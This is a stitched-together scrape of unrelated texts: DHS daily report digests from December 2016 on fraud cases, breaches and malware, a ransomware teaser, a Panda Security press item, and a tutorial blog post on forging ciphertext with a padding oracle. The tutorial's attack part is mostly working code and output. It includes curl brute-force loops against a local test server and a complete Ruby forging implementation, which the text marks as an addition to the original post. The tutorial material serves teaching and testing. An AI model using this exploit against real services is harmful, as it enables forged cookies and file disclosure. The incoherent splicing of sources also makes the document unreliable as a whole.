• The president of Lisle, Illinois-based Capital Management Associates Inc. was charged December 14 for allegedly engaging in a $400 million fraudulent securities trading scheme. – U.S. Attorney’s Office, Northern District of Illinois See item 8 below in the Financial Services Sector

• Officials announced December 16 that Deutsche Bank AG agreed to pay a total of $37 million to resolve charges that the firm made materially false statements and omissions to its clients regarding the Dark Pool Ranking Model feature of one of its order routers. – U.S. Securities and Exchange Commission See item 9 below in the Financial Services Sector

• Lynda.com announced it will notify about 9.5 million users worldwide that their user information may have been compromised after an unauthorized third party accessed a database containing the information. – SecurityWeek See item 26 below in the Information Technology Sector

• Three Romanian nationals were extradited to the U.S. the week of December 12 and charged for their alleged roles in a $4 million cyber fraud scheme where the trio infected at least 60,000 devices, primarily in the U.S. – U.S. Department of Justice See item 29 below in the Information Technology Sector

Financial Services Sector

7. December 17, Southern California City News Service – (California) Recognize the Valley's 'Skipper Bandit' bank robber? The FBI continued to search December 16 for a man dubbed the “Skipper Bandit,” who has allegedly robbed or attempted to rob 6 banks, primarily in California’s San Fernando Valley, between July 2015 and July 2016.

8. December 16, U.S. Attorney’s Office, Northern District of Illinois – (International) Suburban investment advisor charged with securities fraud for engaging in fraudulent allocation scheme. The president of Lisle, Illinois-based Capital Management Associates Inc. was charged December 14 for allegedly placing more than $400 million in securities trades without disclosing in advance if he was trading personal funds or client funds, waiting up to 5 days to allocate the trades so that he could choose the profitable ones for his personal accounts and assign the losing ones to the accounts of unsuspecting clients, as well as withdrawing more than $1 million in profits earned from the scheme from his personal accounts between July 2008 and August 2012. The charges allege that the defendant bought over 16,000 publicly traded securities, including shares in The Walgreen Company, British Petroleum, and Caterpillar Inc., among other firms. Source: https://www.justice.gov/usao-ndil/pr/suburban-investment-advisor-charged-securities-fraud-engaging-fraudulent-allocation

9. December 16, U.S. Securities and Exchange Commission – (International) Deutsche Bank settles charges of misleading clients about order router. The U.S. Securities and Exchange Commission (SEC) and New York Attorney General’s office announced December 16 that Deutsche Bank AG agreed to pay a total of $37 million to resolve charges that the firm made materially false statements and omissions to its clients regarding the Dark Pool Ranking Model feature of one of its order routers, SuperX+, where, due to a coding error, the bank updated the ranking model only once during a 2-year period, causing at least 2 dark pools to receive inflated rankings and consequently generate millions of orders that SuperX+ would have sent elsewhere if the system was operating the way the bank described. The SEC also discovered that the firm manually overrode the Dark Pool rankings in select instances and manually assigned fill rates for new venues based on subjective judgment that was inconsistent with the venues’ real performance. Source: https://www.sec.gov/news/pressrelease/2016-264.html

For another story, see item 28 below in the Information Technology Sector

Information Technology Sector

25. December 19, SecurityWeek – (International) Privilege escalation, RCE flaws patched in Nagios Core. A security researcher from Legal Hackers discovered the Nagios Core alerting and monitoring software is plagued by two vulnerabilities, one of which is a remote code execution (RCE) flaw that can be exploited by a man-in-the-middle (MitM) attacker via the Rich Site Summary (RSS) feed feature, allowing the malicious actor to read and write arbitrary files on the compromised server, as well as execute code in the context of a Nagios user. Once an attacker achieves this level of access, the actor can exploit the second flaw to elevate their privileges to root, potentially causing the entire system to be compromised.
Source: http://www.securityweek.com/privilege-escalation-rce-flaws-patched-nagios-core 

26. December 19, SecurityWeek – (International) LinkedIn’s Lynda.com notifies users of data breach. Lynda.com, LinkedIn’s online learning platform, announced it will notify about 9.5 million users worldwide that their user information may have been compromised after the company became aware that a database containing user information had been accessed by an unauthorized third party. LinkedIn stated the passwords of roughly 55,000 Lynda.com users have been reset as a precaution, and there is no evidence that passwords were exposed or that any data was made publicly available.
Source: http://www.securityweek.com/linkedins-lyndacom-notifies-users-data-breach

27. December 19, SecurityWeek – (International) MacBooks leak disk encryption password. A security researcher discovered that an attacker with physical access to a locked or sleeping Apple MacBook can retrieve the FileVault 2 password in clear text by connecting a special device to the targeted device’s Thunderbolt port due to the fact that the direct memory access (DMA) attack protections are not active before the operating system (OS) has booted, thereby enabling an attacker to read and write memory from a MacBook device via the Thunderbolt device. The researcher found that the attack does not work if the targeted MacBook has been turned off as the password is no longer available in the memory. Source: http://www.securityweek.com/macbooks-leak-disk-encryption-password

28. December 16, SecurityWeek – (International) Updated Tordow Android malware gets ransomware capabilities. Comodo security researchers warned that an updated version of the Tordow Android malware, dubbed Tordow v2.0 was spotted and is now able to act as a ransomware, steal login credentials, and manipulate banking data, as well as encrypt and decrypt files, and remove security software. The malware spreads through compromised variants of popular social media and gaming applications that are available for download via third-party Websites and behave like the legitimate apps, while they include embedded and encrypted malicious functions. Source: http://www.securityweek.com/updated-tordow-android-malware-gets-ransomware-capabilities

29. December 16, U.S. Department of Justice – (International) Three Romanian nationals indicted in $4 million cyber fraud scheme that infected at least 60,000 computers and sent 11 million malicious emails. Three Romanian nationals were extradited to the U.S. the week of December 12 and charged for their alleged roles in a $4 million cyber fraud scheme where the trio infected at least 60,000 devices, primarily in the U.S., by sending more than 11 million malicious emails that contained a malware that the group created in order to harvest personally identifiable information, such as credit card information and user names and passwords from the infected devices. The trio reportedly used the stolen credit card information to fund their criminal activities. Source: https://www.justice.gov/opa/pr/three-romanian-nationals-indicted-4-million-cyber-fraud-scheme-infected-least-60000-computers

Communications Sector

See item 28 above in the Information Technology Sector

Going the other way with padding oracles: Encrypting arbitrary data!

A long time ago, I wrote a couple of blogs that went into a lot of detail on how to use padding oracle vulnerabilities to decrypt an encrypted string of data. It's pretty important to understand how to use a padding oracle vulnerability for decryption before reading this, so I'd suggest going there for a refresher.

When I wrote that blog and the Poracle tool originally, I didn't actually know how to encrypt arbitrary data using a padding oracle. I was vaguely aware that it was possible, but I hadn't really thought about it. But recently, I decided to figure out how it works. I thought and thought, and finally came up with this technique that seems to work. I also implemented it in Poracle in commit a5cfad76ad.

Although I technically invented this technique myself, it's undoubtedly the same technique that any other tools / papers use. If there's a better way - especially on dealing with the first block - I'd love to hear it!

Anyway, in this post, we'll talk about a situation where you have a padding oracle vulnerability, and you want to encrypt arbitrary data instead of decrypting their data. It might, for example, be a cookie that contains a filename for your profile data. If you change the encrypted data in a cookie to an important file on the filesystem, suddenly you have arbitrary file read!

The math

If you aren't familiar with block ciphers, how they're padded, how XOR (⊕) works, or how CBC chaining works, please read my previous post. I'm going to assume you're familiar with all of the above!

We'll define our variables more or less the same as last time:

  Let P   = the plaintext, and Pn = the plaintext of block n (where n is in
            the range of 1..N). We select this.
  Let C   = the corresponding ciphertext, and Cn = the ciphertext
            of block n (the first block being 1) - our goal is to calculate this
  Let N   = the number of blocks (P and C have the same number of blocks by
            definition). PN is the last plaintext block, and CN is
            the last ciphertext block.
  Let IV  = the initialization vector — a random string — frequently
            (incorrectly) set to all zeroes. We'll mostly call this C0 in this
            post for simplicity (see below for an explanation).
  Let E() = a single-block encryption operation (any block encryption
            algorithm, such as AES or DES, it doesn't matter which), with some
            unique and unknown (to the attacker) secret key (that we don't
            notate here).
  Let D() = the corresponding decryption operation.

And the math for encryption:

  C1 = E(P1 ⊕ IV)
  Cn = E(Pn ⊕ Cn-1) - for all n > 1

And, of course, decryption:

  P1 = D(C1) ⊕ IV
  Pn = D(Cn) ⊕ Cn-1 - for all n > 1

Notice that if you define the IV as C0, both formulas could be simplified to just a single line.

The attack

Like decryption, we divide the string into blocks, and attack one block at a time.

We start by taking our desired string, P, and adding the proper padding to it, so when it's decrypted, the padding is correct. If there are n bytes required to pad the string to a multiple of the block length, then the byte n is added n times.

For example, if the string is hello world! and the blocksize is 16, we have to add 4 bytes, so the string becomes hello world!\x04\x04\x04\x04. If the string is an exact multiple of the block length, we add a block afterwards with nothing but padding (so this is a test!!, because it's 16 bytes, becomes this is a test!!\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10, for example). We'll assume a blocksize of 16 throughout.

Once we have a string, P, we need to generate the ciphertext, C from it. And here's how that happens...

Overview

After writing everything below, I realized that it's a bit hard to follow. Math, etc. So I'm going to start by summarizing the steps before diving more deeply into all the details. Good luck!

To encrypt arbitrary text with a padding oracle...

  • Select a string, P, that you want to generate ciphertext, C, for
  • Pad the string to be a multiple of the blocksize, using appropriate padding, then split it into blocks numbered from 1 to N
  • Generate a block of random data (CN - ultimately, the final block of ciphertext)
  • For each block of plaintext, starting with the last one...
    • Create a two-block string of ciphertext, C', by combining an empty block (00000...) with the most recently generated ciphertext block (Cn+1) (or the random one if it's the first round)
    • Change the last byte of the empty block until the padding errors go away, then use math (see below for way more detail) to set the last byte to 2 and change the second-last byte till it works. Then change the last two bytes to 3 and figure out the third-last, fourth-last, etc.
    • After determining the full block, XOR it with the plaintext block Pn to create Cn
    • Repeat the above process for each block (prepend an empty block to the new ciphertext block, calculate it, etc)

To put that in English: each block of ciphertext decrypts to an unknown value, then is XOR'd with the previous block of ciphertext. By carefully selecting the previous block, we can control what the next block decrypts to. Even if the next block decrypts to a bunch of garbage, it's still being XOR'd to a value that we control, and can therefore be set to anything we want.

A quick note about the IV

In CBC mode, the IV - initialization vector - sort of acts as a ciphertext block that comes before the first block in terms of XOR'ing. It's an elusive "zeroth" block: it's not actually decrypted; instead, it's XOR'd against the first real block after decrypting to create P1. Because it's used to set P1, it's calculated exactly the same as every other block we're going to talk about, except the final block, CN, which is random.

If we don't have control of the IV - which is pretty common - then we can't control the first block of plaintext, P1, in any meaningful way. We can still calculate the full plaintext we want, it's just going to have a block of garbage before it.

Throughout this post, just think of the IV as another block of ciphertext; we'll even call it C0 from time to time. C0 is used to generate P1 (and there's no such thing as P0).

Generate a fake block

The "last" block of ciphertext, CN, is generated first. Normally you'd just pick a random blocksize-length string and move on. But you can also have some fun with it! The rest of this section is just a little playing, and is totally tangential to the point; feel free to skip to the next section if you just want the meat.

So yeah, interesting tangential fact: the final ciphertext block, CN can be any arbitrary string of blocksize bytes. All 'A's? No problem. A message to somebody? No problem. By default, Poracle simply randomizes it. I assume other tools do as well. But it's interesting that we can generate arbitrary plaintext!

Let's have some fun:

  • Algorithm = "AES-256-CBC"
  • Key = c086e08ad8ee0ebe7c2320099cfec9eea9a346a108570a4f6494cfe7c2a30ee1
  • IV = 78228d4760a3675aa08d47694f88f639
  • Ciphertext = "IS THIS SECRET??"

The ciphertext is ASCII!? Is that even possible?? It is! Let's try to decrypt it:

  2.3.0 :001 > require 'openssl'
   => true

  2.3.0 :002 > c = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
   => #<OpenSSL::Cipher::Cipher:0x00000001de2578>

  2.3.0 :003 > c.decrypt
   => #<OpenSSL::Cipher::Cipher:0x00000001de2578>

  2.3.0 :004 > c.key = ['c086e08ad8ee0ebe7c2320099cfec9eea9a346a108570a4f6494cfe7c2a30ee1'].pack('H*')
   => "\xC0\x86\xE0\x8A\xD8\xEE\x0E\xBE|# \t\x9C\xFE\xC9\xEE\xA9\xA3F\xA1\bW\nOd\x94\xCF\xE7\xC2\xA3\x0E\xE1" 

  2.3.0 :005 > c.iv = ['78228d4760a3675aa08d47694f88f639'].pack('H*')
   => "x\"\x8DG`\xA3gZ\xA0\x8DGiO\x88\xF69" 

  2.3.0 :006 > c.update("IS THIS SECRET??") + c.final()
   => "NO, NOT SECRET!" 

It's ciphertext that looks like ASCII ("IS THIS SECRET??") that decrypts to more ASCII ("NO, NOT SECRET!"). How's that even work!?

We'll see shortly why this works, but fundamentally: we can arbitrarily choose the last block (I chose ASCII) for padding-oracle-based encryption. The previous blocks - in this case, the IV - are what we actually have to determine. Change that IV, and this won't work anymore.

Calculate a block of ciphertext

Okay, we've created the last block of ciphertext, CN. Now we want to create the second-last block, CN-1. This is where it starts to get complicated. If you can follow this sub-section, everything else is easy! :)

Let's start by making a new ciphertext string, C'. Just like in decrypting, C' is a custom-generated ciphertext string that we're going to send to the oracle. It's made up of two blocks:

  • C'1 is the block we're trying to determine; we set it to all zeroes for now (though the value doesn't actually matter)
  • C'2 is the previously generated block of ciphertext (on the first round, it's CN, the block we randomly generated; on ensuing rounds, it's Cn+1 - the block after the one we're trying to crack).

I know that's confusing, but let's push forward and look at how we generate a C' block and it should all become clear.

Imagine the string:

  C' = 00000000000000000000000000000000 || CN
                ^^^ CN-1 ^^^               

Keep in mind that CN is randomly chosen. We don't know - and can't know - what C'2 decrypts to, but we'll call it P'2. We do know something, though - after it's decrypted to something, it's XOR'd with the previous block of ciphertext (C'1), which we control. Then the padding's checked. Whether the padding is correct depends wholly on C'1! That means by carefully adjusting C'1, we can find a string that generates correct padding for P'2.

Because the only things that influence P'2 are the encryption function, E(), and the previous ciphertext block, C'1, we can set it to anything we want without ever seeing it! And once we find a value for C'1 that makes C'2 decrypt to the P'2 we want, we have everything we need to create a CN-1 that generates the PN we want!

So we create a string like this:

  00000000000000000000000000000000 41414141414141414141414141414141
        ^^^ C'1 / CN-1 ^^^                  ^^^ C'2 / CN ^^^

The block of zeroes is the block we're trying to figure out (it's going to be CN-1), and the block of 41's is the block of arbitrary/random data (CN).

We send that to the server, for example, like this (this is on Poracle's RemoteTestServer.rb app, with a random key and blank IV - you should be able to just download and run the server, though you might have to run gem install sinatra):

  • http://localhost:20222/decrypt/0000000000000000000000000000000041414141414141414141414141414141

We're almost certainly going to get a padding error returned, just like in decryption (there's a 1/256 chance it's going to be right). So we change the last byte of block C'1 until we stop getting padding errors:

  • http://localhost:20222/decrypt/0000000000000000000000000000000141414141414141414141414141414141
  • http://localhost:20222/decrypt/0000000000000000000000000000000241414141414141414141414141414141
  • http://localhost:20222/decrypt/0000000000000000000000000000000341414141414141414141414141414141
  • http://localhost:20222/decrypt/0000000000000000000000000000000441414141414141414141414141414141
  • ...

And eventually, you'll get a success:

$ for i in `seq 0 255`; do
URL=`printf "http://localhost:20222/decrypt/000000000000000000000000000000%02x41414141414141414141414141414141" $i`
echo $URL
curl "$URL"
echo ''
done

http://localhost:20222/decrypt/0000000000000000000000000000000041414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000141414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000241414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000341414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000441414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000541414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000641414141414141414141414141414141
Success!
http://localhost:20222/decrypt/0000000000000000000000000000000741414141414141414141414141414141
Fail!
...

We actually found the valid encoding really early this time! When C'1 ends with 06, the last byte of P'2 decrypts to 01. That means if we want the last byte of the generated plaintext (P'2) to be 02, we simply have to XOR the value by 01 (to set it to 00), then by 02 (to set it to 02). 06 ⊕ 01 ⊕ 02 = 05. Therefore, if we set the last byte of C'1 to 05, we know that the last byte of P'2 will be 02, and we can start bruteforcing the second-last byte:

$ for i in `seq 0 255`; do
URL=`printf "http://localhost:20222/decrypt/0000000000000000000000000000%02x0541414141414141414141414141414141" $i`
echo $URL
curl "$URL"
echo ''
done

http://localhost:20222/decrypt/0000000000000000000000000000000541414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000010541414141414141414141414141414141
Fail!
...
http://localhost:20222/decrypt/0000000000000000000000000000350541414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000360541414141414141414141414141414141
Success!
...

So now we know that when C'1 (the future CN-1) ends with 3605, P'2 ends with 0202. We'll go one more step: if we change C'1 such that P'2 ends with 0303, we can start working on the third-last character in C'1. 36 ⊕ 02 ⊕ 03 = 37, and 05 ⊕ 02 ⊕ 03 = 04 (we XOR by 2 to set the values to 0, then by 3 to set them to 3):

$ for i in `seq 0 255`; do
URL=`printf "http://localhost:20222/decrypt/00000000000000000000000000%02x370441414141414141414141414141414141" $i`
echo $URL
curl "$URL"
echo ''
done

...
http://localhost:20222/decrypt/000000000000000000000000006b370441414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/000000000000000000000000006c370441414141414141414141414141414141
Success!
...

So now, when C'1 ends with 6c3704, P'2 ends with 030303.

We can go on and on, but I automated it using Poracle and determined that the final value for C'1 that works is 12435417b15e3d7552810313da7f2417.

$ curl 'http://localhost:20222/decrypt/12435417b15e3d7552810313da7f241741414141414141414141414141414141'
Success!

That means that when C'1 is 12435417b15e3d7552810313da7f2417, P'2 is 10101010101010101010101010101010 (a full block of padding).

We can once again use XOR to remove 101010... from C'1, giving us: 02534407a14e2d6542911303ca6f3407. That means that when C'1 equals 02534407a14e2d6542911303ca6f3407, P'2 is 00000000000000000000000000000000. Now we can XOR it with whatever we want to set it to an arbitrary value!

Let's say we want the last block to decrypt to 0102030405060708090a0b0c0d0e0f (15 bytes). We:

  • Add one byte of padding: 0102030405060708090a0b0c0d0e0f01
  • XOR C'1 (02534407a14e2d6542911303ca6f3407) with 0102030405060708090a0b0c0d0e0f01 => 03514703a4482a6d4b9b180fc7613b06
  • Append the final block, CN, to create C: 03514703a4482a6d4b9b180fc7613b0641414141414141414141414141414141
  • Send it to the server to be decrypted...
$ curl 'http://localhost:20222/decrypt/03514703a4482a6d4b9b180fc7613b0641414141414141414141414141414141'
Success

And, if you actually calculate it with the key I'm using, the final plaintext string P' is c49f1fdcd1cd93daf4e79a18637c98d80102030405060708090a0b0c0d0e0f.

(The block of garbage is a result of being unable to control the IV)

Calculating the next block of ciphertext

So now, where have we gotten ourselves?

We have values for CN-1 (calculated) and CN (arbitrarily chosen). How do we calculate CN-2?

This is actually pretty easy. We generate ourselves a two-block string again, C'. Once again, C'1 is what we're trying to bruteforce, and is normally set to all 00's. But this time, C'2 is CN-1 - the ciphertext we just generated.

Let's take a new C' of:

00000000000000000000000000000000 03514703a4482a6d4b9b180fc7613b06
        ^^^ C'1 / CN-2 ^^^                 ^^^ C'2 / CN-1 ^^^

We can once again determine the last byte of C'1 that will cause the last character of P'2 to be valid padding (01):

$ for i in `seq 0 255`; do
URL=`printf "http://localhost:20222/decrypt/000000000000000000000000000000%02x3514703a4482a6d4b9b180fc7613b06" $i`
echo $URL
curl "$URL"
echo ''
done
...
http://localhost:20222/decrypt/000000000000000000000000000000313514703a4482a6d4b9b180fc7613b06
Fail!
http://localhost:20222/decrypt/000000000000000000000000000000323514703a4482a6d4b9b180fc7613b06
Fail!
http://localhost:20222/decrypt/000000000000000000000000000000333514703a4482a6d4b9b180fc7613b06
Success!
...

...and so on, just like before. When this block is done, move on to the previous, and previous, and so on, till you get to the first block of P. By then, you've determined all the values for C1 up to CN-1, and you have your specially generated CN with whatever value you want. Thus, you have the whole string!

To put it another way, we calculate:

  • CN = random / arbitrary
  • CN-1 = calculated from CN combined with PN
  • CN-2 = calculated from CN-1 combined with PN-1
  • CN-3 = calculated from CN-2 combined with PN-2
  • ...
  • C1 = calculated from C2 combined with P2
  • C0 (the IV) = calculated from C1 combined with P1

So as you can see, each block is based on the next ciphertext block and the next plaintext block.
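Here is the whole procedure from the overview, as an added example in Ruby that is not from the post and not Poracle's code. The oracle is simulated locally with a constructed key (the forging code never reads it), CN is chosen freely (random, or an ASCII string as in the "Generate a fake block" section), every earlier block is recovered byte by byte exactly as walked through above, and the computed C0 is used as the IV so the first block is controlled too. It also handles the last-byte false positive the search can hit (an accepted guess that is really ...02 02 rather than 01) by re-checking with the preceding byte changed.

```ruby
require 'openssl'
require 'securerandom'

BLOCK = 16

# Constructed demo key: only the simulated server uses it; the forging code never reads it.
DEMO_KEY = ['00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'].pack('H*')

# PKCS#7 padding exactly as the post describes: n bytes of value n, always at least one byte.
def pkcs7_pad(str)
  n = BLOCK - (str.bytesize % BLOCK)
  str.b + (n.chr * n)
end

def pkcs7_unpad(str)
  n = str.bytes.last
  raise 'bad padding' if n.nil? || n < 1 || n > BLOCK || n > str.bytesize
  raise 'bad padding' unless str.bytes.last(n).all? { |b| b == n }
  str[0...-n]
end

def xor(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# Raw CBC decryption with padding checks disabled; used by the oracle and the verifier only.
def cbc_decrypt_raw(key, iv, ct)
  c = OpenSSL::Cipher.new('AES-256-CBC')
  c.decrypt
  c.key = key
  c.iv = iv
  c.padding = 0
  c.update(ct) + c.final
end

# The vulnerable server: takes IV || ciphertext (like the post's /decrypt URL) and
# answers only "was the padding valid?". That single bit is the whole vulnerability.
def padding_oracle(blob)
  iv, ct = blob[0, BLOCK], blob[BLOCK..-1]
  return false if ct.nil? || ct.empty? || ct.bytesize % BLOCK != 0
  pkcs7_unpad(cbc_decrypt_raw(DEMO_KEY, iv, ct))
  true
rescue StandardError
  false
end

# Recover D(block), the unknown value a block decrypts to before the CBC XOR.
# This is the post's C' = X || block search: adjust X byte by byte until the
# oracle accepts a full block of padding, then strip the padding values out of X.
def find_intermediate(block, oracle)
  x = "\x00".b * BLOCK                     # C'1 starts as all zeroes
  (1..BLOCK).each do |pad|
    pos = BLOCK - pad
    # Re-target the already-solved tail from pad-1 to pad (e.g. 06 ^ 01 ^ 02 = 05).
    (pos + 1...BLOCK).each { |i| x.setbyte(i, x.getbyte(i) ^ (pad - 1) ^ pad) }
    hit = (0..255).find do |guess|
      x.setbyte(pos, guess)
      next false unless oracle.call(x + block)
      # Edge case on the last byte: a hit may be a longer padding such as 02 02
      # instead of 01. Changing the preceding byte breaks the former, not the latter.
      if pad == 1
        probe = x.dup
        probe.setbyte(pos - 1, probe.getbyte(pos - 1) ^ 0xff)
        next false unless oracle.call(probe + block)
      end
      true
    end
    raise 'oracle never accepted a byte (no padding leak?)' if hit.nil?
  end
  xor(x, BLOCK.chr * BLOCK)                # X ^ (10 10 ... 10) == D(block)
end

# Forge IV || C1 .. CN that decrypts to `plaintext`, last block first as in the post.
# CN is free to choose (random by default); every earlier block down to C0 = IV is computed.
def forge(plaintext, oracle, last_block: SecureRandom.random_bytes(BLOCK))
  padded = pkcs7_pad(plaintext)
  blocks = (0...padded.bytesize).step(BLOCK).map { |i| padded[i, BLOCK] }
  c_next = last_block.b
  out = c_next
  blocks.reverse_each do |p|
    c_prev = xor(find_intermediate(c_next, oracle), p)   # Cn-1 = D(Cn) ^ Pn
    out = c_prev + out
    c_next = c_prev
  end
  out
end

# Verifier: decrypt a forged blob with the real key to confirm it is the plaintext we chose.
def decrypt_with_key(blob)
  pkcs7_unpad(cbc_decrypt_raw(DEMO_KEY, blob[0, BLOCK], blob[BLOCK..-1]))
end

if __FILE__ == $PROGRAM_NAME
  blob = forge('hello world!', method(:padding_oracle))
  puts decrypt_with_key(blob)   # hello world!
end
```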

Conclusion

Well, that's about all I can say about using a padding oracle vulnerability to encrypt arbitrary data.

If anything is unclear, please let me know! And, you can see a working implementation in Poracle.rb.

The changing face of ransomware

2016 saw a rapid rise to prominence of ransomware, with estimates of $1 billion in proceeds going to ransomware threat actors making it a major crime activity. I’ve written before about ransomware (here, here and here) – this post looks at interesting recent developments. Approximately 40% of spam emails now contain ransomware attacks. Ransomware infections …

Monday, December 19, 2016

Complete DHS Report for December 19, 2016

Daily Report

Top Stories

• A resident of Alaska was indicted December 15 for his alleged role in a scheme where he and 4 co-conspirators provided services to Iran that resulted in the unlawful distribution of roughly $1 billion U.S. dollars. – U.S. Attorney’s Office, District of Alaska See item 4 below in the Financial Services Sector

• Six individuals were charged in an indictment unsealed December 13 for their alleged roles in a $50 million investment fraud scheme. – U.S. Attorney’s Office, Southern District of New York See item 5 below in the Financial Services Sector

• Pomona, California-based East Valley Community Health Center, Inc. announced December 14 that the patient information on 65,000 insurance claims was compromised after an unauthorized actor hacked its system and installed ransomware that encrypted files on a single server in October. – Inland Valley Daily Bulletin

24. December 16, Inland Valley Daily Bulletin – (California) Data breach at Pomona health clinic affected patient information. Pomona, California-based East Valley Community Health Center, Inc. announced December 14 that the patient information on 65,000 insurance claims from the past 6 years was compromised after an unauthorized actor hacked into its computer system and installed ransomware that encrypted files on a single server in October. There has been no indication that the patient information was accessed or illegally used. Source: http://www.dailybulletin.com/general-news/20161215/data-breach-at-pomona-health-clinic-affected-patient-information

• A 6-alarm fire at a mixed-use building in the Charlestown neighborhood of Boston displaced 23 people and damaged multiple apartments December 16, causing an estimated $2 million in damage. – WBZ 4 Boston

36. December 16, WBZ 4 Boston – (Massachusetts) Charlestown apartments, laundromat featured in ‘The Town’ destroyed in 6-alarm fire. A 6-alarm fire at a mixed-use building in the Charlestown neighborhood of Boston displaced 23 people and damaged multiple apartments and a laundromat December 16, causing an estimated $2 million in damage. No injuries were reported and the cause of the fire remains under investigation.
Source: http://boston.cbslocal.com/2016/12/16/bunker-hill-street-fire-charlestown-boston/

Financial Services Sector

3. December 16, Associated Press – (Ohio) Feds: Man suspected as ‘Buckeye Bandit’ indicted in Ohio. A man dubbed the “Buckeye Bandit” was indicted December 15 for allegedly committing 7 armed bank robberies across central Ohio since 2013. He was previously indicted for one armed bank robbery in November, when authorities discovered over $53,000 in his possession. Source: http://www.dailyprogress.com/feds-man-suspected-as-buckeye-bandit-indicted-in-ohio/article_aa71dbf3-d68a-5fda-a4c5-be7496cb54f5.html

4. December 15, U.S. Attorney’s Office, District of Alaska – (International) U.S. citizen charged with conspiring to provide unlawful services to Iran and international money laundering conspiracy. An Anchorage, Alaska man was indicted December 15 for his alleged role in a scheme where he and 4 co-conspirators provided services to Iran that resulted in the unlawful distribution of roughly $1 billion U.S. dollars equivalent of Iranian owned funds between January 2011 and at least April 2014 after the man stored the proceeds from fictitious sales of marble and other construction materials to an Iranian shell company in controlled South Korean bank accounts, and then converted the proceeds into more easily tradeable currencies by convincing the Korean regulators the transactions were lawful before transferring the finances to over 10 countries. The charges allege the man received between $10 million and $17 million from Iranian nationals for his criminal activities. Source: https://www.justice.gov/usao-ak/pr/us-citizen-charged-conspiring-provide-unlawful-services-iran-and-international-money-1

5. December 13, U.S. Attorney’s Office, Southern District of New York – (International) Manhattan U.S. Attorney announces charges against six individuals in international high-yield investment fraud scheme. Six individuals were charged in an indictment unsealed December 13 for their alleged roles in a $50 million investment fraud scheme that defrauded investors in the U.S. and several foreign countries between at least June 2013 and August 2016 by purporting that their Cities Upliftment Program (CUP) would produce considerably high returns, claiming that half of the returns would help rejuvenate American cities recovering from the 2008 financial crisis, while the other half would be paid back to the investors at the rate of $1 million per day for 75 banking days, and by using forged and counterfeit New York Fed documents, among other material misrepresentations, to persuade victims to invest in the CUP scheme. The group reportedly laundered the proceeds through various domestic and overseas bank accounts held in the names of shell companies they operated. Source: https://www.justice.gov/usao-sdny/pr/manhattan-us-attorney-announces-charges-against-six-individuals-international-high

For another story, see item 30 below in the Information Technology Sector

Information Technology Sector

29. December 16, SecurityWeek – (International) Joomla patches dangerous security flaws. Joomla released version 3.6.5 to resolve three security issues, including a high severity flaw plaguing all Joomla iterations from 1.6.0 – 3.6.4 which could be exploited to allow an attacker to modify existing user accounts including altering usernames, user group assignments, and passwords. In addition to the patches, the update included additional security hardening mechanisms.

30. December 15, Agence France-Presse – (International) Suspect arrested in JPMorgan, Dow Jones data theft case. A U.S. citizen living in Moscow was arrested at John F. Kennedy International Airport in New York December 14 after he allegedly orchestrated computer hacking crimes against U.S. financial institutions, brokerage firms, and financial news publishers, including a hack that compromised the data on 7 million businesses and 76 million household customers of JPMorgan Chase & Co and other firms. The man and his co-conspirators also allegedly operated an Internet gambling scheme, an unlawful bitcoin exchange, and an illicit payment processing operation for fraudulent online pharmaceutical sellers.  Source: http://www.securityweek.com/suspect-arrested-jpmorgan-dow-jones-data-theft-case

31. December 15, SecurityWeek – (International) Over 8,800 WordPress plugins have flaws: Study. RIPS Technologies researchers released a report after analyzing 44,705 plugins in the official WordPress plugins directory, which found a total of 67,486 vulnerabilities in the plugins, including 41 critical flaws, 2,799 high severity flaws, and more than 4,600 medium severity security holes. The study also revealed that more than 68 percent of the vulnerabilities discovered are cross-site scripting (XSS) issues and over 20 percent are Structured Query Language (SQL) injection flaws.

32. December 15, SecurityWeek – (International) Nymaim trojan fingerprints MAC addresses to bypass virtualization. SophosLabs security researchers reported that the Nymaim trojan was spotted comparing a targeted machine’s media access control (MAC) address against a hardcoded list of blacklisted vendors, enabling the malware to avoid virtual environments and hinder analysis tools. The researchers also found that the trojan includes a list of checks and continues running even after those checks fail in order to hide its failure. Source: http://www.securityweek.com/nymaim-trojan-uses-mac-addresses-bypass-virtualization

Communications Sector

33. December 15, SecurityWeek – (International) Malvertising campaign targets routers. Proofpoint security researchers reported that attackers behind the DNSChanger exploit kit (EK) were attempting to infect home or small office (SOHO) routers using an enhanced version of the DNSChanger, and subsequently expose the router to further attacks as the EK changes network rules to make the administration ports available from external addresses. The researchers reported malicious actors are leveraging the attacks in order to steal traffic from large Web ad agencies, and users can prevent their devices from being infected by updating their routers to the most updated firmware. Source: http://www.securityweek.com/malvertising-campaign-targets-routers

34. December 15, Iowa City Press-Citizen – (Iowa) Mediacom services restored in Iowa City area. Up to 1,800 Mediacom customers in the Iowa City, Iowa area were without Internet, cable, and phone services for more than 10 hours December 14 after a city-owned construction vehicle inadvertently cut a main line of a fiber optic cable. Source: http://www.press-citizen.com/story/money/business/2016/12/14/mediacom-outage-iowa-city-area-may-take-hours-repair/95445896/

IQ Retail Guards Against New Age Threats with Panda Security


“Stories of cyber-attacks hit the news almost daily – data breaches, DDoS attacks, email hacks and phishing attacks – reminders of the dangers of the internet,” says Jeremy Matthews, Regional Manager of Panda Security Africa. “Yet somehow all of these attacks still seem foreign – as though it would never happen to you. However, the reality is, South African businesses are affected by these threats,” continues Matthews.

IQ Retail MD Chris Steyn knows this all too well and has seen first-hand the dramatic rise of new age threats such as ransomware. Software company IQ Retail provides expertise in complete financial and business administration solutions, focusing on the development of business systems for the accounting and retail management environment. Since its inception in 1986, IQ Retail has grown to become one of the premium providers of innovative business solutions.

